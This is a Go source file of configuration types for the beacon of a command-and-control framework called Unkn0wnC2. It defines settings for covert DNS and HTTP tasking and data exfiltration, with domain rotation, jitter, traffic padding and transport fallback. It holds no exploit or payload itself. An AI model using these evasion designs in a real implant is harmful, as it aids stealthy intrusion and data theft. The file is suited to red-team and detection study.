// Package main defines data structures and types for the Unkn0wnC2 client.
// This file contains configuration structures and other type definitions
// used throughout the client codebase.
package main

// PhaseConfig holds per-phase malleable DNS settings
type PhaseConfig struct {
	QueryType     string // "TXT" (default) or "A"
	Encrypted     bool   // AES-GCM encryption (true = aes-gcm-base36, false = plain base36)
	MaxPayload    int    // Max encoded subdomain chars (0 = auto from DNS budget)
	PayloadFormat string // Subdomain template e.g. "XXXX-XXXX.XXXX-XXXX" (empty = default 62-char labels)
	ARecordACKIP  string // IP server returns for ACK in A-record mode (empty = default 127.0.0.1)
}

// PollPhaseConfig extends PhaseConfig with poll-specific A-record fields
type PollPhaseConfig struct {
	PhaseConfig
	ARecordTaskIP   string // IP server returns when task is pending (empty = default 127.0.0.2)
	TxtFollowUpSecs int    // Seconds to wait before TXT follow-up when A record signals task pending (0 = use sleep interval)
}

// Config holds the client configuration - embedded at build time
type Config struct {
	ServerDomain        string   // Legacy single domain (for backward compatibility)
	DNSDomains          []string // Multiple DNS C2 domains (new multi-domain support)
	DomainSelectionMode string   // Mode: "random", "round-robin", "failover" (default: "random")
	DNSServer           string
	QueryType           string // Legacy global query type (used as fallback)
	Encoding            string // Legacy global encoding (used as fallback)
	EncryptionKey       string
	Timeout             int
	MaxCommandLength    int // Legacy global max command length (used as fallback)
	RetryAttempts       int
	SleepMin            int
	SleepMax            int
	ExfilJitterMinMs    int
	ExfilJitterMaxMs    int
	ExfilChunksPerBurst int
	ExfilBurstPauseMs   int
	MaxSubdomainLength  int    // Legacy global max subdomain (used as fallback)
	PayloadFormat       string // Legacy global payload format (used as fallback)
	BeaconName          string // Operator-assigned beacon name (e.g., "recon-alpha")
	BuildID             string // Short build ID generated by Archon at build time
	StagedRegistration  bool   // Split initial CHK into 3 smaller queries across check-in intervals

	// Per-phase malleable configuration
	Registration PhaseConfig
	Poll         PollPhaseConfig
	DataExfil    PhaseConfig

	// Transport selects how this beacon reaches its C2 servers:
	//   "dns"  — DNS only (default, and the behaviour of every build made
	//            before HTTP transport existed)
	//   "http" — HTTP/HTTPS only
	//   "dual" — DNS A-record signalling plus HTTP tasking and results
	//
	// Set at build time by Archon and changeable at runtime through an
	// update_transport task, the same way Shadow Mesh domains are updated.
	Transport     string
	HTTPListeners []HTTPListener // Endpoints to use, in preference order
	// HTTPFallbackAfterFailures is how many consecutive HTTP failures make the
	// beacon fall back to DNS in dual mode. Zero means the default.
	HTTPFallbackAfterFailures int
	// HTTPRetryBackoffSecs is how long a fallen-back beacon waits before
	// probing HTTP again. Zero means the default.
	HTTPRetryBackoffSecs int
}

// HTTPBodyCodec describes how an HTTP request or response body is encoded.
type HTTPBodyCodec struct {
	Encoding   string `json:"encoding"`
	Field      string `json:"field"`
	PaddingFld string `json:"padding_field"`
	PadMin     int    `json:"pad_min"`
	PadMax     int    `json:"pad_max"`
}

// HTTPHeader is one header in an authoritative wire template. Operations limits
// it to register, task, result and/or ack; an empty list applies it everywhere.
type HTTPHeader struct {
	Name       string   `json:"name"`
	Value      string   `json:"value"`
	Operations []string `json:"operations,omitempty"`
}

// HTTPAuth describes how requests are authenticated to a listener.
type HTTPAuth struct {
	Mode        string `json:"mode"`         // hmac-sha256 (default), shared-header, none
	Header      string `json:"header"`       //
	SigEncoding string `json:"sig_encoding"` // hex or base64
}

// HTTPListener is one malleable HTTP/HTTPS endpoint.
type HTTPListener struct {
	Name       string `json:"name"`        // Profile name, used in logs
	Scheme     string `json:"scheme"`      // "http" or "https"
	Host       string `json:"host"`        // host:port
	HostHeader string `json:"host_header"` // Host header override (empty = Host field)

	// SPKISHA256 is the base64 SHA-256 of the listener certificate's
	// SubjectPublicKeyInfo. When set, the beacon pins it and refuses any other
	// certificate, so a self-signed listener cannot be impersonated.
	SPKISHA256 string `json:"spki_sha256"`

	URIs           map[string][]string `json:"uris"`            // operation -> path(s)
	Methods        map[string]string   `json:"methods"`         // operation -> HTTP method
	UserAgents     []string            `json:"user_agents"`     // rotational pool
	Headers        []HTTPHeader        `json:"headers"`         // legacy custom headers before automatic headers
	RequestHeaders []HTTPHeader        `json:"request_headers"` // authoritative ordered wire template when non-empty
	RequestBody    HTTPBodyCodec       `json:"request_body"`    // outbound body encoding
	ResponseBody   HTTPBodyCodec       `json:"response_body"`   // inbound body encoding
	Auth           HTTPAuth            `json:"auth"`            // request authentication
	TimeoutSecs    int                 `json:"timeout_secs"`    // per-request timeout
	MaxBodyBytes   int64               `json:"max_body_bytes"`  // response size cap
}

// baseURL returns the scheme://host prefix for this listener.
func (l HTTPListener) baseURL() string {
	scheme := l.Scheme
	if scheme == "" {
		scheme = "https"
	}
	return scheme + "://" + l.Host
}

// GetDomains returns the list of domains to use
// Prioritizes DNSDomains array, falls back to ServerDomain for backward compatibility
func (c *Config) GetDomains() []string {
	if len(c.DNSDomains) > 0 {
		return c.DNSDomains
	}
	if c.ServerDomain != "" {
		return []string{c.ServerDomain}
	}
	return []string{}
}

// GetSelectionMode returns the domain selection mode, defaulting to "random"
func (c *Config) GetSelectionMode() string {
	if c.DomainSelectionMode == "" {
		return "random"
	}
	return c.DomainSelectionMode
}

// GetRegistrationPhase returns the resolved registration phase config
func (c *Config) GetRegistrationPhase() PhaseConfig {
	p := c.Registration
	if p.QueryType == "" {
		p.QueryType = c.getDefaultQueryType()
	}
	if !p.Encrypted && c.Registration.QueryType == "" {
		p.Encrypted = c.getDefaultEncrypted()
	}
	if p.MaxPayload == 0 && c.MaxSubdomainLength > 0 {
		p.MaxPayload = c.MaxSubdomainLength
	}
	if p.PayloadFormat == "" && c.PayloadFormat != "" {
		p.PayloadFormat = c.PayloadFormat
	}
	return p
}

// GetPollPhase returns the resolved poll phase config
func (c *Config) GetPollPhase() PollPhaseConfig {
	p := c.Poll
	if p.QueryType == "" {
		p.QueryType = c.getDefaultQueryType()
	}
	if !p.Encrypted && c.Poll.QueryType == "" {
		p.Encrypted = c.getDefaultEncrypted()
	}
	if p.MaxPayload == 0 && c.MaxSubdomainLength > 0 {
		p.MaxPayload = c.MaxSubdomainLength
	}
	if p.PayloadFormat == "" && c.PayloadFormat != "" {
		p.PayloadFormat = c.PayloadFormat
	}
	if p.ARecordACKIP == "" {
		p.ARecordACKIP = "127.0.0.1"
	}
	if p.ARecordTaskIP == "" {
		p.ARecordTaskIP = "127.0.0.2"
	}
	return p
}

// GetDataExfilPhase returns the resolved data exfil phase config
func (c *Config) GetDataExfilPhase() PhaseConfig {
	p := c.DataExfil
	if p.QueryType == "" {
		p.QueryType = c.getDefaultQueryType()
	}
	if !p.Encrypted && c.DataExfil.QueryType == "" {
		p.Encrypted = c.getDefaultEncrypted()
	}
	if p.MaxPayload == 0 {
		if c.MaxSubdomainLength > 0 {
			p.MaxPayload = c.MaxSubdomainLength
		} else if c.MaxCommandLength > 0 {
			p.MaxPayload = c.MaxCommandLength
		}
	}
	if p.PayloadFormat == "" && c.PayloadFormat != "" {
		p.PayloadFormat = c.PayloadFormat
	}
	return p
}

func (c *Config) getDefaultQueryType() string {
	if c.QueryType != "" {
		return c.QueryType
	}
	return "TXT"
}

func (c *Config) getDefaultEncrypted() bool {
	return c.Encoding != "base36"
}

// Note: The actual configuration values are generated at build time
// in config.go by the generate_config.go tool
